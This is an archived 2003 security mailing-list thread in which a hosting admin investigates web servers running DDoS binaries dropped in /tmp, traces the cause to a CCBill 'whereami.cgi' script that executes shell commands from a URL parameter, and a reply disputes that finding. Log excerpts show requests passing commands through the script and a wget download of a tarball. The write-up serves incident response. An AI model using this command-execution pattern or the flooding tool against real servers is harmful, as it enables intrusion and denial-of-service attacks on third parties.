As far as I can see from the whereami.cgi from one of my client's site it's
just shows values from
($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
$mtime, $ctime, $blksize, $blocks) = stat("./whereami.cgi");
and there is no backdoor like interface to command line.
You must be reviewing already backdoored script.
-xtm
> -----Original Message-----
> From: Dayne Jordan [mailto:djordanat_private]
> Sent: Thursday, July 03, 2003 9:47 PM
> To: incidentsat_private
> Subject: Another overflow exploit for Apache? *RESOLVED*
>
>
> Greetings again,
>
> We found that this exploit was NOT a result of an Apache exploit.
>
> After waiting for the culprits to attempt their mischeif again, we were
> waiting and watched as they re-uploaded their rogue Ddos scripts to /tmp
> and executed thru Apache - not to our surprise, it appears CCBILL once
> again has some very exploitable 'helper' scripts they upload when
> installing
> their software.
>
> On ALL the machines with the Ddos behavior we found, there was one common
> script on all of them ' whereami.cgi '. This script, when executed from
> the browser allows system commands to be entered and executed as the web
> server. We even used wget and lynx thru this command interface to upload
> various things into /tmp/. Our culprits were uploading old-school
> and common
> Ddos binaries, then executing them.. nothing root worthy, but nonetheless
> a pain in the arse.
>
> Excerpt log entries from our test machines:
>
> Machine getting it - how we uploaded a test binary:
> 216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST
> /ccbill/whereami.cgi?g=ls
> HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls"
> "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"
>
> Machine serving it:
> 216.226.xxx.xxx - - [03/Jul/2003:11:59:59 -0400] "GET
> /rogue-test.tar HTTP/1.0"
> 200 286720 "-" "Wget/1.5.1"
>
> Other things we did with it:
> 216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET
> /ccbill/whereami.cgi?g=mkdir%20/tmp/boo
> HTTP/1.1" 200 247 "-" "Mozilla/4.0
> (compatible; MSIE 5.5; Windows 98; H010818; T312461)"
>
> and then...
>
> su-2.02# ls -la /tmp
> drwxrwxrwt 6 root wheel 3072 Jul 3 12:42 .
> drwxr-xr-x 19 root wheel 512 Mar 17 17:01 ..
> drwxr-xr-x 2 nobody wheel 512 Jul 3 12:44 boo
> srwxrwxrwx 1 mysql wheel 0 Jul 3 00:05 mysql.sock
> [snipped]
>
> And snippet from one of the affected machines running 'hell' a simple
> Ddos binary:
> 172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET
> /ccbill/whereami.cgi?g=v/hell
> HTTP/1.1" 200 265 "-" "Mozilla/4.0
>
> Once you initiate the /whereami.cgi?g=ls command from the
> browser, you then
> get an input box and an enter button on your browser - execute any command
> you like, including wget, lynx, tar, sh, etc etc.
>
> This script is most likely used by CCBILL techs as part of their default
> installation so that they can administer/setup their necessary
> scripts/software. Unfortunately,
> there is a huge hole in this script. We have a customer who very
> recently had CCBILL setup their services on his website and the very same
> 'whereami.cgi' exists even on this current date build.
>
> So in short, those of you who use CCBILL make sure to remove or render
> useless the 'whereami.cgi' script in your /ccbill directory(ies). Across
> all our machines where we know CCBILL exists we've found this script on
> every one so far - and removed it ;)
>
> D.
> =========
>
>
> >
> > Greetings,
> >
> > Over the past 2 days we were alerted to 2 machines doing over
> 10mbits/sec
> > each. Upon further investigation here is what we found...
> >
> > Lets start with OS and essentials:
> > =====================================
> > - BSDi 4.2, patched current
> > - Apache 1.3.27 (running as nobody:nobody) non-suexec
> > - PHP-4.3.2 (allow_uploads=Off)
> >
> > We have found v2k.tar uploaded to /tmp/ and a new directory: /tmp/v/.
> >
> > su-2.02# ls -la /tmp
> > drwxrwxrwt 2 root wheel 2560 Jul 2 13:40 .
> > drwxr-xr-x 17 root wheel 512 Nov 3 2002 ..
> > -rw-r--r-- 1 nobody wheel 1762550 Jul 2 12:07 iprot-ip_log
> > -rw-r--r-- 1 nobody wheel 739326 Jul 2 11:13 iprot-user_log
> > -rw-r--r-- 1 nobody wheel 16384 Jul 2 13:48 iprot.db
> > srwxrwxrwx 1 root wheel 0 Apr 29 02:16 mysql.sock
> > drwxr-xr-x 3 nobody wheel 512 Oct 9 2002 v
> > -rw-r--r-- 1 nobody wheel 253952 Jul 2 09:21 v2k.tar
> >
> > Contents of /tmp/v:
> >
> > su-2.02# ls -lR
> > total 164
> > -rwxr-xr-x 1 nobody wheel 13157 Nov 28 2002 hell
> > -rw-r--r-- 1 nobody wheel 102400 Sep 13 2002 k.tar
> > drwxr-xr-x 2 nobody wheel 512 Nov 28 2002 netbios
> > -rwxr-xr-x 1 nobody wheel 21866 Oct 9 2002 usg
> > -rwxr-xr-x 1 nobody wheel 15807 Nov 8 2002 vadimI
> >
> > ./netbios:
> > total 94
> > -rwxr-xr-x 1 nobody wheel 53760 Nov 28 2002 nbtscan
> > -rwxr-xr-x 1 nobody wheel 18070 Nov 28 2002 smbkill
> > -rwxr-xr-x 1 nobody wheel 23305 Nov 28 2002 smbnuke
> >
> > The program found running was 'hell':
> > An excerpt from ps aux/axl:
> >
> > nobody 3981 1 252 22385e0 0 I ?? 0:00.01 sh -c v/hell
> 62.221.xxx.xx 110 2>&1
> > nobody 3982 3981 252 22385e0 0 RN ?? 10:17.28 v/hell
> 62.221.xxx.xx 110
> > nobody 4002 1 252 22385e0 0 I ?? 0:00.07 sh -c v/hell
> 62.221.xxx.xx 110 2>&1
> > nobody 4003 4002 252 22385e0 0 R ?? 9:53.19 v/hell
> 62.221.xxx.xx 110
> > nobody 4033 1 252 22385e0 0 I ?? 0:00.09 sh -c v/hell
> 202.8.xxx.xxx 110 2>&1
> > nobody 4034 4033 252 22385e0 0 R ?? 8:18.19 v/hell 202.8.xxx.xxx 110
> > nobody 4051 1 252 22385e0 0 I ?? 0:00.08 sh -c v/hell
> 202.8.xxx.xxx 110 2>&1
> > nobody 4052 4051 252 22385e0 0 R ?? 7:40.63 v/hell 202.8.xxx.xxx 110
> > nobody 4122 1 252 22385e0 0 I ?? 0:00.04 sh -c v/hell
> 202.73.xxx.xxx 110\r\nwhoami; 2>&1
> > nobody 4179 1 252 22385e0 0 I ?? 0:00.06 sh -c v/hell
> 202.73.xxx.xxx 110\r\nwhoami; 2>&1
> > nobody 4180 4179 252 22385e0 0 R ?? 4:43.55 v/hell 202.73.xxx.xxx 110\r
> > nobody 4213 1 252 22385e0 0 I ?? 0:00.05 sh -c v/hell
> 66.151.xx.xx 110\r\nwhoami; 2>&1
> >
> > su-2.02# strings hell
> > /lib/ld-linux.so.2
> > __gmon_start__
> > libc.so.6
> > printf
> > connect
> > socket
> > bzero
> > send
> > __deregister_frame_info
> > bcopy
> > gethostbyname
> > htons
> > exit
> > atoi
> > _IO_stdin_used
> > __libc_start_main
> > __register_frame_info
> > GLIBC_2.0
> > PTRh
> > Bombing %s, port %d
> > Unknown host: %s
> > Syntax: ./hell host port
> > Port can be any port, any of them work equally well
> > FUCKER!!!!
> > su-2.02#
> >
> > -System binaries are fine checking via known good BSDi 4.2
> machines md5 output
> > -Nothing unusual running via netstat/sockstat
> > -Scanned externally for anything rogue listening - 0 found.
> > -root/admin accounts are not compromised
> >
> > The v2k.tar date/time was 09:21 July 2nd, 2003. A grep thru all
> the webserver
> > logs for 1-2 minutes on either side of that time do not reveal
> any unusual
> > requests that would look like an overflow type string that
> we've seen attempted
> > in the past.
> >
> > Any clues?
> >
> > D.
> > ===========
>
> ------------------------------------------------------------------
> ----------
> Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
> world's premier technical IT security event! 10 tracks, 15
> training sessions,
> 1,800 delegates from 30 nations including all of the top experts,
> from CSO's to
> "underground" security specialists. See for yourself what the
> buzz is about!
> Early-bird registration ends July 3. This event will sell out.
www.blackhat.com
----------------------------------------------------------------------------
----------------------------------------------------------------------------
Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
world's premier technical IT security event! 10 tracks, 15 training sessions,
1,800 delegates from 30 nations including all of the top experts, from CSO's to
"underground" security specialists. See for yourself what the buzz is about!
Early-bird registration ends July 3. This event will sell out. www.blackhat.com
----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Thu Jul 03 2003 - 13:06:11 PDT